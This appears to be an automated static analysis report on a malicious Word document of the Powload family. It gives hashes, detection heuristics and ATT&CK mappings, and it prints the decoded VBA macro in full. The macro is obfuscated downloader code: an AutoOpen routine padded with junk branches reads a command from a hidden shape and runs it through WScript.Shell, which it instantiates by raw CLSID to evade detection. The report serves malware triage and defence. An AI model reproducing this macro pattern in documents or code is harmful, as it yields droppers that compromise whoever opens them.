Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 aac219dff293ccaf…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 77.8 KB
Created: 2018-11-26 16:13:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: d3fcf9f5868afb025192037cf3164a5c
SHA-1: 13c70ca5429793393a50ce27517741eb613f7837
SHA-256: aac219dff293ccaf9f8ec70575185c6579f723691cfc901c17f5095af439483f
Risk Score: 252

Malware Insights

MITRE ATT&CK
  • T1059.003 Windows Command Shell
  • T1203 Exploitation for Client Execution

The sample contains VBA macros designed to execute obfuscated commands via cmd.exe. Specifically, the AutoOpen macro constructs and runs a complex command string that appears to download and execute a second-stage payload. Instantiating WScript.Shell by its raw CLSID rather than its ProgID further indicates an intent to interact with the system while evading name-based detection.

Heuristics (9)

  • ClamAV: Doc.Malware.Powload-6775323-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Powload-6775323-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • VBA instantiates a dangerous COM class by CLSID [critical] (OLE_VBA_GETOBJECT_CLSID_DANGEROUS)
    VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
    Matched line in script:
          End Select
    Set SKNLli = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bcOhIKt)
       On Error Resume Next
  • GetObject call [high] (OLE_VBA_GETOBJ)
    GetObject call
    Matched line in script:
          End Select
    Set SKNLli = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bcOhIKt)
       On Error Resume Next
  • AutoOpen macro [low] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script:
    Attribute VB_Customizable = True
    Sub AutoOpen()
       On Error Resume Next
  • Suspicious cmd.exe invocation with execution flag [high] (SC_STR_CMD)
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the legacy Word macro execution surface; by itself it does not attribute a downloader or a parser CVE.
  • Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6806 bytes
SHA-256: 59096927f01063a6d531abc24a0efba110199dbba5e8d713edde060972cd362e
Detection: ClamAV: No threats found
Obfuscation or payload: likely
109 of 163 identifiers look randomly generated (e.g. 'NarmvINMqnkL'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "qLWJVzw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
      Select Case EdnbV
         Case 171915710
            Hmozd = 252445714
            vKITZfT = CLng(53884184)
         Case 32346758
            zsUGkILW = Oct(PQKIKvSBC)
            QqKmAppSm = diwYDbcG
         Case 320116756
            idbkWKk = CDate(zYGiR)
            otpFTQ = Int(307001358 * ZjPjUlEiS)
      End Select
   On Error Resume Next
      Select Case pwQwHwzdR
         Case 147208844
            mQMuHBZw = 276619519
            RjWXGq = CLng(249665415)
         Case 90566389
            jBDlYYO = Oct(iifWOcKcJ)
            JFWhnFj = NtaBHLP
         Case 304863865
            jiinVtHu = CDate(KrCHMv)
            MbIACOwBA = Int(75997176 * TdWTHUp)
      End Select
Set iNnPa = Shapes("NarmvINMqnkL")
   On Error Resume Next
      Select Case uaZBYjXFa
         Case 2309754
            pFHla = 205503100
            kfYiITV = CLng(129520066)
         Case 291203322
            FaAwDSLU = Oct(lfQGI)
            dHRPES = jMQOYMRF
         Case 207604940
            rkAzz = CDate(mnvRZ)
            zUYPTfMDE = Int(263971796 * Pqoiouw)
      End Select
cYarBTAmPGi = "" + fcIAP + wpJtlt + aYWIO + DPkJK + iNnPa.TextFrame.TextRange.Text + szOfnWvB + BLYbf
   On Error Resume Next
      Select Case bwCDpzB
         Case 46729088
            iOYKDUS = 154742898
            BVcLLdXR = CLng(210548936)
         Case 12300487
            OzboO = Oct(WAAEh)
            ihROR = lpWAZccz
         Case 105486520
            ZfYTzzPi = CDate(kwzwRWkU)
            witOGj = Int(305416970 * lNawMR)
      End Select
   On Error Resume Next
      Select Case Whjlq
         Case 342307649
            DsQwrp = 129312861
            PimJGi = CLng(193695721)
         Case 94406064
            kCBfZlX = Oct(qRQjSTwXN)
            UaFMQ = CwXBPrbsS
         Case 49718789
            nwldG = CDate(wBXDkzPnl)
            ZIoXXlKdd = Int(92171677 * kzqXNKS)
      End Select
   On Error Resume Next
      Select Case hPwhkLi
         Case 111619465
            TaBzMnzh = 272522927
            bSoGsvat = CLng(136070643)
         Case 270553890
            zNjCM = Oct(JDBmZbQ)
            ivdhu = BuEQC
         Case 297611781
            GmKRN = CDate(jWMUuzS)
            dnwCrYzK = Int(338806946 * LanzDJQAT)
      End Select
Set SKNLli = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bcOhIKt)
   On Error Resume Next
      Select Case hNILcORwj
         Case 272614853
            iPEBQiVV = 110422557
            IXJpcq = CLng(192569596)
         Case 45411639
            fKhua = Oct(WpShWM)
            JMJLuG = VjnufZq
         Case 338584135
            AYnpiKZ = CDate(Udjtp)
            otCuN = Int(321273322 * RvWkfvXn)
      End Select
   On Error Resume Next
      Select Case niKHWz
         Case 62712291
            TQjUBr = 299574856
            mjzzwP = CLng(28373123)
         Case 133794171
            ZzFZrHkb = Oct(ziAlnX)
            WTwUaBaO = szUJMY
         Case 175096216
            awAEqbJws = CDate(sLKBsbMbw)
            zGYXq = Int(54366830 * JPSzbHKKq)
      End Select
   On Error Resume Next
      Select Case TqSuVzPp
         Case 254953312
            SRzFA = 18554173
            ToXFNuKo = CLng(174765228)
         Case 214726531
            vMFcRRj = Oct(jJHwp)
            qSuXnvG = hBabj
         Case 44710062
            IFvQtuZAq = CDate(iZATiMpif)
            bPRmkOt = Int(204209981 * CqkZE)
      End Select
   On Error Resume Next
      Select Case ILHuLLkSf
         Case 35205140
            XWQJQwWn = 95169026
            AtrnN = CLng(51610355)
         Case 130353324
            zVZwREj = Oct(QStXnW)
            wLDYzUWF = wqISPHwD
         Case 112630638
            fjPbELcBj = CDate(urSdL)
            cJiUFdQrz = Int(179830947 * OzJTpGwqw)
      End Select
Const wMizh = 0
   On Error Resume Next
      Select Case rFitF
         Case 69091941
            CImbX = 64553337
            UEOAaa = CLng(117841373)
         Case 256185431
            OkQhQWAo = Oct(ThKAoRPHS)
            wzQQiZKpJ = iLlEaUIoc
         Case 254955387
            IzjEcGUP = CDate(lTIRqhwUm)
            FhrrR = Int(47664962 * FZUIaifTn)
      End Select
   On Error Resume Next
      Select Case wPYnm
         Case 153911123
            UfjfS = 111806296
            klvkoQG = CLng(78309060)
         Case 316795503
            pzNNtR = Oct(zRwFz)
            aSEGBpA = sOpdX
         Case 184530810
            piAmTEzpJ = CDate(bNbfASVl)
            VRjKF = Int(146015791 * SwiYjVpRK)
      End Select
SKNLli.Run! cYarBTAmPGi, wMizh
   On Error Resume Next
      Select Case PuhqtZM
         Case 99214300
            wvzkicV = 303259403
            CjINH = CLng(288308409)
         Case 118798962
            wYYaIh = Oct(NLBSQ)
            bGQfpzpUm = msKuS
         Case 100331047
            mqYhb = CDate(qDpOzWTa)
            dNaZs = Int(226264793 * tcrLRm)
      End Select
   On Error Resume Next
      Select Case FEcrjzVY
         Case 68880352
            VWtVOWSwi = 159733432
            XZVLL = CLng(50446225)
         Case 204684516
            iTqmaJ = Oct(DIOvSmdfc)
            nsuMWRcG = iiGfUrp
         Case 31625011
            iijTMVSJ = CDate(jFOtusfX)
            kGIBNf = Int(314139097 * OzctEch)
      End Select
   On Error Resume Next
      Select Case SGSKm
         Case 298416984
            kESCTnbpu = 207580043
            TjwWHJIYZ = CLng(59435681)
         Case 137644640
            cssnE = Oct(BmJzXl)
            CoHdzUQwr = sKvwJBOU
         Case 232688174
            zqJbAW = CDate(ttlWLKW)
            VBuco = Int(26556528 * lJzcIO)
      End Select
   On Error Resume Next
      Select Case HjwSdjVD
         Case 247477994
            ltJQHiE = 34883385
            fVuOTK = CLng(62508234)
         Case 31716602
            wiCqw = Oct(iYDItirw)
            PHcjElL = LpQLNS
         Case 187534503
            UiUEH = CDate(vviljbv)
            hnWYwL = Int(221072836 * AOnNqAh)
      End Select
   On Error Resume Next
      Select Case XjaYisz
         Case 311681866
            ZfuOYk = 306694237
            TSuutlcKv = CLng(166535911)
         Case 292192121
            clEtD = Oct(wUULp)
            mtnPX = FuqmQ
         Case 62710060
            jizwO = CDate(TEvqnaAK)
            naXIdo = Int(51301277 * wMmqTzJpU)
      End Select
End Sub